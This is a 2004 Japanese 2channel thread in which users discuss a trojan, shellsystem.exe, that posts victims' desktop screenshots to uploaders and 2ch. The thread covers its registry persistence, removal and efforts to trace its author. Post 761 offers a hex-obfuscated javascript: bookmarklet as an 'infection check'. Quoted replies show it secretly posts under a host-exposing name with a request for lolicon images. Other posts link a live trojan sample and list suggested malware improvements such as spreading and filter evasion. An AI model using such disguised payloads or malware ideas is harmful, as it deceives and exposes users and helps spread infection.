>>682 タスクマネージャひらいてプロセス見て、 なかにshellsystem.exeってのがあったらアウト。 686 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:12:36 ID:LvJ+JBBu] >>682 つーか、exe実行したの？実行してないなら９割９分平気。 687 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:19:35 ID:EETLBaqB] >>685 アリガトウ。感染してないみたいだ。良かった >>686 してないと思う。 688 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:29:09 ID:xduUn+v/] 作りこんではあるが、洗練されてない 不必要なコードがいっぱいあるけど、なんでやろ。 ttp://www.ff.iij4u.or.jp/~ch2/bbstable.html ここからターゲット（おすすめ、チャット、特別企画、ツール類、運営案内など）を選択、 FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&key=%s&time=%s&submit=%sで、メル欄に回数 subject=%s&FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&time=%s&submit=%s、スレ作成機能 form-data /upload/c=03okari/confirm.cgi up.isp.2ch.net up.isp.2ch.net/upload/c=03okari/confirm.cgi この辺で取得して書きコ Software\Meropa ？？なんだろこのディレクトリ Software\Microsoft\Windows\CurrentVersion\Run 投下先 Software\Microsoft\Microsotf 何か投下 フォルダアイコンはbitmapをそのまま使ってるから変なんだな 逆アセも簡単そうなので、環境持ってると............ パラメータを変えるだけで、感染能力含め、かなりいろいろなことができるように作ってある いわば、キンタマメイカーのようなものか？ 689 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:30:41 ID:yEjCkAsP] カキコの内容少し弄るだけで又２ｃｈに投稿されるようになるしな 690 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:33:43 ID:62NRg8JO] 将来のために余裕を持って設計してあるってことか… 691 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:35:48 ID:MBxbzncs] まだまだ祭りは続きそうだ 692 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:39:42 ID:9fWyBJ/z] 今日はネットをしていなかった 今更ながらウィルスの存在を知った。 さっそく調べて行って見た。 関さんが面白いと思った。 693 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:39:47 ID:qx0T+sDR] ｷﾝﾀﾏ騒ぎがあってよかーたと重田 694 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:09:24 ID:LvJ+JBBu] >>690 いくらでも亜種が作れるってことだろうな 695 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:12:23 ID:rtwkFYAH] >>685 タスクマネージャのプロセスから削除だけじゃダメなの？ 696 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:19:45 ID:kOQgldzO] 当たり前だろ… 697 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:21:34 ID:rtwkFYAH] やっぱりだめか 698 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:23:04 ID:qaAkrrtW] 再起動したら復活するし 699 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:25:47 ID:Y5vbHsBs] HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run ここら辺もregeditで見とけよ 700 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:27:59 ID:rtwkFYAH] shellsystem.exe以外は無視してOK？ あとノートンで遮断した場合は画像は流れない？ 701 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:34:09 ID:XZhKNgqY] なんだか調子に乗って改造した奴が先に逮捕されそう 702 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:37:36 ID:rMURrwFg] 牛に我慢させるか 703 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:40:22 ID:EiFN9IZi] 誤爆だ　わりぃ 704 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:44:18 ID:62NRg8JO] これならとってもわかりやすい画像ですな v.isp.2ch.net/up/6e671bb4b867.jpg　もう典型的かと 705 名前：[名無し]さん(bin+cue).rar [04/09/23 04:58:57 ID:MZi2DiBQ] これｘｐ以外は平気なの？ 706 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:59:21 ID:SFKAhjW3] ノートンインターネットセキュリティの様なものが常駐してたら プログラムによって勝手に晒されるようなことは無いよな？ 707 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:00:55 ID:JtMoVLJN] plaza.rakuten.co.jp/sakinya/ 708 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:02:56 ID:g70Ywgh6] >>705 どうしてそういう結論になるのかが判らん。 >>706 設定次第。学習モードとかでユーザが勝手な通信を許可したら､ なんぼセキュリティソフトが入っててもそりゃアウトにもなる。 709 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:04:36 ID:Q7dG25BA] アップローダから知らないファイル落としたりしなきゃ、感染しないんだよな？ こうもいっぱいかかってると、最近何も落としてないのに不安になる 710 名前：[名無し]さん(bin+cue).rar [04/09/23 05:04:47 ID:MZi2DiBQ] >>708 ボロPCで感染実験してみたのさ（OS　ME） そんで晒されるか待ってるだけど、一向にうｐされないんでつよ。 711 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:05:29 ID:4TL6YJ26] まぁ拡張子表示はしっかりしとけってこったな 712 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:09:58 ID:xduUn+v/] >>705 苺キンタマ(仮)は、Windows 98以降なら感染というか、踏んだら効果を示す >>706 httpを使うからWebが見られる環境ならアウト（f/wで80番閉じてれば別だが、web見られないよ） 713 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:10:25 ID:5x3EooTF] v.isp.2ch.net/up/4250ab8226aa.jpg 貴様ッ見ているな！ 714 名前：[名無し]さん(bin+cue).rar [04/09/23 05:13:40 ID:MZi2DiBQ] windows\shellsystem.exeはあったんだけど レジストリは追加されてないんだよね これじゃまだ感染しとらんのかね？ もう一回踏んでみるかな。。。 715 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:14:27 ID:57yhE0eV] PFW入れてれば、ウィルスが通信しようとしたのを検知してくれるんじゃないかい 何でもOKで通してれば意味無いけど あと、SP2のPFWはアウトバウンド検知してくれないんだっけ？ 716 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:18:37 ID:aY8YkHOS] ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip トロイらしいんだけど、だれか解析頼む。 717 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:19:45 ID:xduUn+v/] >>715 ウイルスというか、現時点ではトロイなんだが 通信といっても、書き込みと変わらんからf/wでの検知は難しい XP SP2のf/wは、外→内のみ。 718 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:25:36 ID:JsiucGEH] 結局はキンタマと同じでexeを実行しなければいいってことだけど XPは標準で表示しないしな。 何でこんな仕様なんだorz ところでアップローダスレを自分のユーザ名で検索してしまった香具師 ﾉｼ 719 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:25:48 ID:eq0QK75x] 俺もサンプルとして捕獲しておきたいんだが、苺1の1360の三点セットってやつでいいんだよね。 720 名前：[名無し]さん(bin+cue).rar [04/09/23 05:27:02 ID:Ypzo5dny] ってかny関係ないじゃん・・・ 721 名前：[名無し]さん(bin+cue).rar [04/09/23 05:28:00 ID:0ylh05j4] ｽﾚﾀｲでややこしくなってるね 722 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:28:17 ID:57yhE0eV] >>717 普通のPFWってEXEファイル単位で通信を検知して知らせてくれんじゃないの？ ループバックでも利用してない限りは大丈夫だと思うが 723 名前：719 mailto:sage [04/09/23 05:29:12 ID:eq0QK75x] ＯＫ、これであってたようだ。 724 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:29:54 ID:MqBRPt/h] >httpを使うからWebが見られる環境ならアウト（f/wで80番閉じてれば別だが、web見られないよ） >f/w 725 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:33:52 ID:Pi3bt/OK] おもしろそいので俺も捕獲しとこ 726 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:34:21 ID:AH6SroMo] さて、キンタマと違って 特定のサイトやアップローダーに書き込みを行う以上 そこから業務妨害で損害賠償請求されてもおかしくないトロイなんだが ま、日本の警察じゃ作成者を特定できんだろうな・・・ でも、苺にexeファイルをアップした人間を特定して締め上げればいいのか？ 727 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:34:22 ID:Pi3bt/OK] 間違え;y=ｰ( ﾟдﾟ)･∵.　ﾀｰﾝ 728 名前：[名無し]さん(bin+cue).rar [04/09/23 05:50:14 ID:U98tvZkV] 要望まとめ ・複数のうpろだをランダムに使うように(2ちゃんねるアップローダーはやめれ) ・デスクトップ画像以外もうｐするように(kakikomi.txtとか) ・繁殖機能。zipで適当なファイルといっしょにウィルス本体も固めてうｐ。 ・Rock54対策。NGワードが含まれる書き込みが規制されるから晒しテンプレを複数作れば大丈夫か? 729 名前：[名無し]さん(bin+cue).rar [04/09/23 05:50:39 ID:VGKgqq6T] なんで怪しいexeファイルを実行すんのかなって思ってたけど 拡張子を表示しない設定だと初心者はわからんわな〜 730 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:52:17 ID:IFT2b9V5] >>728 要望するなよ(笑) 731 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:52:23 ID:4TL6YJ26] セキュリティに対する意識ってなかなかあがらないな 732 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:54:24 ID:fgnK5pHv] >>728 共犯者ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!! 733 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:56:44 ID:tcoLxpqV] 人間のロリ好きってアニメ、ゲームも好む傾向があるんだな。 なかなか興味深かった。 734 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:58:31 ID:cTDJ+/Lv] kakikomi晒されたら辛いな 他の情報で個人割れてたらきっと死人が出る 735 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:07:00 ID:JsiucGEH] exeごとに通信制御するNortonとかのFWは ポート80番使ってようとブロックするんじゃないの？ 736 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:09:13 ID:IFT2b9V5] >>735 する。というか、初物がソケットひらこうとしたときに騒ぐ。 737 名前：[名無し]さん(bin+cue).rar [04/09/23 06:10:23 ID:0ylh05j4] で、エロの魔力で許可するをクリック！ 738 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:18:26 ID:0jfdhz8j] 簡易プロテクト？ C:\WINDOWS>copy notepad.exe shellsystem.exe C:\WINDOWS>attrib +R shellsystem.exe とりあえず実験用の９８ＳＥ環境ではうまくいった。 メインマシンで実験する度胸はないので、ＸＰなどでは不明。 739 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:25:02 ID:J6w/KxT0] これ犯人たどれるだろ。ネットカフェとかかな？ 740 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:26:03 ID:IFT2b9V5] >>739 踏み台はさまってたら無理 741 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:29:08 ID:J6w/KxT0] >>740 プロバイダに問い合わせりゃアクセス記録のこってんじゃないの？ 742 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:12 ID:IFT2b9V5] >>741 ドコのプロバイダに問い合わせるの？ 743 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:29 ID:JsiucGEH] 海外プロキシを多段でかましてればよほどのことがないと たどれてもたどらないと思う。 744 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:35:42 ID:J6w/KxT0] >>742 踏み台のだよ。 745 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:38:02 ID:IFT2b9V5] >>744 もし俺が犯人だったとしたら、踏み台にしろ串にしろ 一段ではやらないだろうね。捕まりたくないし。 746 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:16 ID:xduUn+v/] >>739 追求のキーになるのが >>688で報告した > Software\Meropa ？？なんだろこのディレクトリ なんだが、こんなディレクトリを作るアプリは、かなーり特殊な 半導体設計用のものらしい。こんなの入れてる人間は国内では限られる。 ここから手繰るのがよさげ。スキルは相当と思えるので、配布元から掘るのは難しそう 747 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:33 ID:J6w/KxT0] >>745 俺がもし被害者だったら100段くらいまでは頑張ってたどるよｗ この手のウイルスは犯人が殺されても不思議じゃないと思うんだが。 748 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:13 ID:xduUn+v/] >>747 そこいらに、いくらでもある WEP無効の無線LANを踏み台にしてたら、 多段串・海外串なんか使わなくても たどるのは難しい。 749 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:40 ID:J6w/KxT0] 殺されるは言い過ぎかｗ　でもなんらかの報復は受けると思う。 つーか踏み台に時限セットされたものなら辿るの不可能っぽいな・・ 750 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:45:30 ID:zW53Q5jb] ネカフェで時限式アップロードするように仕込んだとか。 751 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:46:34 ID:99Ier2R9] 頑張れ。 752 名前：[名無し]さん(bin+cue).rar [04/09/23 07:02:00 ID:CBy0Cio6] こうゆうのを見ると2chやnyする人ってヒッ●ーだけなのかなって思うね v.isp.2ch.net/up/fa86350a6026.jpg ウイルスに気づかずに必死に抜いている人1名ｗ 753 名前：469 mailto:sage [04/09/23 07:04:35 ID:kh8TR4yq] これって本人達が寝てる間は安全なんだね。 754 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:08:11 ID:kh8TR4yq] 数字消すの忘れた・・・＿|￣|○ 755 名前：[名無し]さん(bin+cue).rar [04/09/23 07:08:12 ID:CBy0Cio6] どうせなら、SS、PC名だけじゃなくて、 IP・ホストも晒してほしかったな 756 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:12:12 ID:IFT2b9V5] >>752 これは狙ってやってる気がしないではないな(笑) 757 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:45:55 ID:CtAJ3p7u] 俺はこんなウイルスは怖くて作れないな 何が怖いって狙われるのが怖いね 作った奴は絶対に捕まらないと思ってるんだから 本気になって追ってみたら面白いことになるかも 例えばウイルス作者が警察だったりしたらヤバイだろうし。 そうじゃなくても作った奴は確実に追われた後人生終わるだろうし そんな一世一代の大事俺は出来ない 758 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:14:59 ID:wZ9Gu9IX] 新種ウイルスと聞いてきました 759 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:15:35 ID:iqYKdWhe] 面白い事考える奴もいるもんだな 760 名前：[名無し]さん(bin+cue).rar [04/09/23 08:18:41 ID:U98tvZkV] Winnyは関係ないけどな。 今やってるのはShareで回ってるふしあなで2ch書き込みと半虹の苺ｷﾝﾀﾏ 761 名前：[名無し]さん(bin+cue).rar [04/09/23 08:25:55 ID:U98tvZkV] 便乗してこれまで流行ってる JavaScript:document.body.innerHTMLのｶﾞｲﾄﾞﾗｲﾝ2 that3.2ch.net/test/read.cgi/gline/1076853643/595-586 感染確認するには 2ch専用ブラウザを使用している人は、ＩＥなどの一般的なブラウザでこのスレを開いておく。 １、 javascript:s='7769746828646f63756d656e742e666f726d735b305d297b 46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414 7452e76616c75653d275c75333045445c75333045415c75373533425c75 353043465c75333034465c75333036305c75333035355c7533303434273 b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+= '%'+s.substr(l,2);eval(unescape(e)); をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。 ２、 改行を外して１行にする。 ３、 １行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。 ４、 Enterを押す（もしくは「移動」をクリックする）。 エラーが出れば感染してます 762 名前：[名無し]さん(bin+cue).rar [04/09/23 08:26:46 ID:U98tvZkV] >>761 参照間違えた・・ that3.2ch.net/test/read.cgi/gline/1076853643/595-596 763 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:27:19 ID:1gUyhrM3] 　 764 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:51:04 ID:SPCjNc3y] 俺はﾍﾟｹﾋﾟｰがはじめての初心者だが、拡張子表示は真っ先にやったぞ…。 まぁ、かつては黒羊とﾒｰﾙｽﾄｰﾑをふんだ苦い経験持ちだが。 765 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:07:42 ID:SY1J+4JW] >>761 ﾜﾛﾀ ロリ画像ですか 766 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:08:11 ID:GmtpX3PS] 【使用OS】WinXP 【WindowsUpdateしてるか】はい。 【AntiVirusは】 ？？ 【ちゃんとUpdateしてるか】？？ 【スキャンした結果】オンラインにてスキャン 【オンラインスキャンしたならその結果は】いつもなら数個出るのに、不自然なぐらい何も検出されませんでした。 【Winnyのﾊﾞｰｼﾞｮﾝ】使ってません。ネットでウィルス貰いました。 【Winny歴、総DL量は】 無し 【テンプレを読んだか】 はい。 【テンプレにある対策を実行したか】 実行しました。特に何も無かったです。 【症状か具体的に、分かる限りすべて書く】 何となく、重い。動作が鈍い。 【何をしたらそんなことになったのか】 うｐされてたファイルを開いたら。 【これまでにとった措置】オンラインスキャンのみ。 767 名前：[名無し]さん(bin+cue).rar [04/09/23 09:12:14 ID:U98tvZkV] >>766 (写真集) (ロリータ) 水原友里.exe (写真集) (ロリータ) 相田香奈子.exe コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe どれか開いた? 768 名前：[名無し]さん(bin+cue).rar [04/09/23 09:19:52 ID:Jz5Ghtix] キンタマ作った香具師、逮捕されたのか 769 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:25:30 ID:GmtpX3PS] >>767 開いたというか、ダブルクリックして開こうとした。 どれだったか覚えてない…。多分、２回ぐらい開こうとした。 何か怪しかったし、急にPCの反応がおかしくなったから、速攻電源切りました。 その後にまた起動して、全部ゴミ箱に捨てて、ゴミ箱も空にしました。 770 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:46 ID:kh8TR4yq] >>769 もう遅いｗ とりあえず↓に来い。 削除の方法が分かるかもしれない。 アップローダーってずるい idol.bbspink.com/test/read.cgi/ascii2d/1095880065/ 771 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:49 ID:j/Jnnczc] >>769 今すぐネットを切断 C:\WINDOWSフォルダの中でshellsystem.exeを消せ 再起動して後は知ってるならレジストリの自動実行の辺りを探せ 急げ 772 名前：[名無し]さん(bin+cue).rar [04/09/23 09:29:12 ID:U98tvZkV] >>769 とりあえずユーザ名とコンピュータ名を晒せ。 マイコンピュータのプロパティから見れる。 773 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:30:19 ID:afWjuRcq] >>766 ご愁傷様 774 名前：[名無し]さん(bin+cue).rar [04/09/23 09:30:56 ID:0ylh05j4] >>685 を見て確認してみ 775 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:41:27 ID:P9SKfCRL] >>762 596 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 22:21:33 ID:aLtl7+rE< >>595のやつやると名前欄fusianasan、本文ロリ画像くださいで勝手に投稿されるってわけか？ 597 名前：水先案名無い人[] 投稿日：04/09/21(火) 23:16:48 ID:raTTdWET< 16進でご苦労な事だ。 598 名前：p29d3b8.urawac00.ap.so-net.ne.jp[] 投稿日：04/09/21(火) 23:18:09 ID:ItaWKNCP< ロリ画像ください 599 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 23:18:27 ID:ItaWKNCP< orz 600 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 00:18:50 ID:8s+8uxdE< おらは投稿確認が出て助かっただ 601 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 01:00:01 ID:A3RcQubp< そいえば、たいていの掲示板ってhttpだからポストする時に 暗号化されていないデータが云々のダイアログを出せるはずだが、 それを解除してる人って結構多いみたいだね。 602 名前：zaq3d2e96f7.zaq.ne.jp[] 投稿日：04/09/22(水) 02:42:09 ID:nVW0EyTb< ロリ画像ください 603 名前：濡れ衣 zaq3d2e96f7.zaq.ne.jp ◆SbICHIROZ6 [sage] 投稿日：04/09/22(水) 02:43:59 ID:nVW0EyTb< 570はどうなるかちゃんと書いておいてくれよ。。 リモホ晒すのは構わないけど、テストスレになっちまうぞ 604 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 03:55:11 ID:7PnzxniJ< いかん、笑いが止まらんｗ やらんでよかったｗ 776 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:47:30 ID:tcoLxpqV] ノートンでスキャン中の画像がよく晒されてたけど 対策ソフト入れてると安心するから簡単に引っかかるんじゃないの。 しかもこういう祭り時には無力。全くの無駄金だな。 777 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:53:59 ID:qlyssBj7] 拡張子表示は鬱陶しいし、長いスペースとかがあるから詳細表示のファイルの種類で判断してるなぁ 778 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:55:34 ID:GmtpX3PS] >>771 そのレジストリとやらは良く分からんが… まあ、とりあえず初心者板で聞いてくる。 検索したらshellsystem.exeが見付かった。 とりあえず、急ぎます。ありがとう。 779 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:57:12 ID:cDvdfQLH] >拡張子表示は鬱陶しい ﾊｧ? 780 名前：[名無し]さん(bin+cue).rar [04/09/23 10:00:05 ID:/EYVc77v] 明かされてる画像みても無害？ 781 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:01:16 ID:xduUn+v/] いくらノートン先生でも、登場したてのトロイにすぐには反応できませんぜ 今回の作成日時は、3本とも22日15:57 流されたのが夕方としても、まだ 10時間しかたってない。しかも踏んでるやつ大杉。 作者も、これほどの効果を期待してなかっただろーな。そうでなきゃアプロダ が落ちるというのも考慮してると思う。この反応からして、ここ数日間に数種の 亜種が出てくると思う。トロイの改変も楽勝っぽいので、便乗犯も多そう。 一番のセキュリティホールは、ユーザーの意識だもんよ。 782 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:05 ID:Ze0M08FR] ちなみにキンタマが発見されたのが3月半ば。対応は3月末。 783 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:32 ID:kDRZUavo] 歴史は繰り返す。 784 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:05:29 ID:4TL6YJ26] そして人は学ばない 785 名前：[名無し]さん(bin+cue).rar [04/09/23 10:07:05 ID:7loVoFeI] mp3の名前などを勝手にいじるウィルスってあります？ 786 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:08:25 ID:LvJ+JBBu] >>729 アイコンでわかるだろ？ 787 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:12:17 ID:kDRZUavo] >>786 アイコンがフォルダアイコンに偽装されてるから無知が実行する。 788 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:16:24 ID:qJ0+JsGI] で、誰かウイルス駆除ソフト屋さんに報告したの? 789 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:23:29 ID:iqYKdWhe] >>780 画像自体は無害。 って、こんな程度の知識の人が踏むんだろうなぁ。 790 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:29:04 ID:ky5A4Ls4] >>789 ttp://www.microsoft.com/japan/security/security_bulletins/ms04-028e.asp こんなのがあるから一概には大丈夫とは言えないかもしれない 791 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:30:06 ID:0lvmtZMl] >>789 っていう、おまえも相当やばいのだが 792 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:32:33 ID:cDvdfQLH] >>789 　　　　　　　　　　　　　　　　　　　　　　　　　　,､ｧ 　　　　　　　　　　　　　　　　　　　　　　　　,､ '";ｨ' _＿_＿＿___　　　　　　　　　　　　　　　 ／::::::/l:l ─- ､::::;;;;;;;;;｀ﾞﾞ''‐ ､　 　 __,,,,......,,,,_／:::::::::/: !| 　　. : : : : : : ｀ﾞ'ヽ､:::ﾞヾ´::::::::::::::::::::::｀ﾞﾞﾞ'''‐'､. l|　　　またまた　ご冗談を ､､ . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!　　　　　　　　　　　　　　　　　,､- ､ .ヽ:ﾞヽ; : : : : : :ノ:::::::::::::::::::::;;､-､､ﾞ::: 　 　 rｰ-:'､　　　　　　　　　　　　　 　 ／　　 }¬､ .　＼::ﾞ､: : : :./::::::::::::::;､-''"::::::::::　　　,...,:::,::.,　:::':､　　　　　　　　　　　_,,/,,　 ,､.,/ 　 } 　　　ヽ:ヽ､ /:::::::::::::::::::::::::　 　 　_　　｀ﾞ''‐''"　 __,,',,,,___　　　　　　　／~　　 ヾ::::ﾂ,､-/ 　　　　 ｀ヽ､:::::::::;;;､､--‐‐'''''',,iﾆ-　　　 _|　　､-l､,},,　 ￣""'''¬-, '　 ''‐-､ .,ﾉ'ﾞ,i';;;;ﾂ 　　　_,,,､-‐l'''"´:::::::'　　,､-'" ,.X,_,,､-v'"''ﾞ''yr-ヽ / ﾞﾞ'ヽ､,　　　 ,.'　　　 　 jﾞ,,, ´　7 ,､-''"　　 　.l:::::::::::;､-''"　 ,.-'　　ﾞ､""ヾ'r-;;:l　　冫、 　 　 ヽ､ /　 　 __,,.ノ:::::ヽ. / 　　　　　　　l;､-'ﾞ:　　 ,／　　　 　　 ゞ=‐'"~ﾞﾞ')　./.　＼　　　　/　　'''"/::::;:::;r-''‐ヽ 　　　　　,､‐ﾞ ヽ:::::..,.r'ﾞ　　　　　　　　 ,,. ,r／ ./　　　 ヽ.　　 ,'　　 　 '､ノ''"　　　ﾉ 　　 ,､‐'ﾞ　　 　 ﾝ;"::::::.　　　　　　　"´ 'ﾞ ´　/　　　　　 ﾞ､　,'　　　 　 　 　 　 ／ 　　'　　　　　／/:::::::::　　　　　　　　　　　　{.　　　　　 　 V　　 　 　 　 　 ／ 　 　 　 　 ／ ./:::::::::::::　　　　　　　　　　　　',　　　　　　 /　　　　　　 　 / .　　　　／　 /:::::::::::::::::.　　　　　　　　　　　　',.　　　　 /　　 ,.､　　　　 / 793 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:35:22 ID:iqYKdWhe] >>790-792 いやあ、もちろんgdiplus.dllは知ってますって。わざわざ書かなくていいかと思ったんだけど。 こんなにレスが付くとは…。 794 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:36:31 ID:cDvdfQLH] >>793 　　　　　　　　　　　　　　　　　　　　　　　　　　,､ｧ 　　　　　　　　　　　　　　　　　　　　　　　　,､ '";ｨ' _＿_＿＿___　　　　　　　　　　　　　　　 ／::::::/l:l ─- ､::::;;;;;;;;;｀ﾞﾞ''‐ ､　 　 __,,,,......,,,,_／:::::::::/: !| 　　. : : : : : : ｀ﾞ'ヽ､:::ﾞヾ´::::::::::::::::::::::｀ﾞﾞﾞ'''‐'､. l|　　　またまた　ご冗談を ､､ . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!　　　　　　　　　　　　　　　　　,､- ､ .ヽ:ﾞヽ; : : : : : :ノ:::::::::::::::::::::;;､-､､ﾞ::: 　 　 rｰ-:'､　　　　　　　　　　　　　 　 ／　　 }¬､ .　＼::ﾞ､: : : :./::::::::::::::;､-''"::::::::::　　　,...,:::,::.,　:::':､　　　　　　　　　　　_,,/,,　 ,､.,/ 　 } 　　　ヽ:ヽ､ /:::::::::::::::::::::::::　 　 　_　　｀ﾞ''‐''"　 __,,',,,,___　　　　　　　／~　　 ヾ::::ﾂ,､-/ 　　　　 ｀ヽ､:::::::::;;;､､--‐‐'''''',,iﾆ-　　　 _|　　､-l､,},,　 ￣""'''¬-, '　 ''‐-､ .,ﾉ'ﾞ,i';;;;ﾂ 　　　_,,,､-‐l'''"´:::::::'　　,､-'" ,.X,_,,､-v'"''ﾞ''yr-ヽ / ﾞﾞ'ヽ､,　　　 ,.'　　　 　 jﾞ,,, ´　7 ,､-''"　　 　.l:::::::::::;､-''"　 ,.-'　　ﾞ､""ヾ'r-;;:l　　冫、 　 　 ヽ､ /　 　 __,,.ノ:::::ヽ. / 　　　　　　　l;､-'ﾞ:　　 ,／　　　 　　 ゞ=‐'"~ﾞﾞ')　./.　＼　　　　/　　'''"/::::;:::;r-''‐ヽ 　　　　　,､‐ﾞ ヽ:::::..,.r'ﾞ　　　　　　　　 ,,. ,r／ ./　　　 ヽ.　　 ,'　　 　 '､ノ''"　　　ﾉ 　　 ,､‐'ﾞ　　 　 ﾝ;"::::::.　　　　　　　"´ 'ﾞ ´　/　　　　　 ﾞ､　,'　　　 　 　 　 　 ／ 　　'　　　　　／/:::::::::　　　　　　　　　　　　{.　　　　　 　 V　　 　 　 　 　 ／ 　 　 　 　 ／ ./:::::::::::::　　　　　　　　　　　　',　　　　　　 /　　　　　　 　 / .　　　　／　 /:::::::::::::::::.　　　　　　　　　　　　',.　　　　 /　　 ,.､　　　　 / 795 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:15 ID:iqYKdWhe] 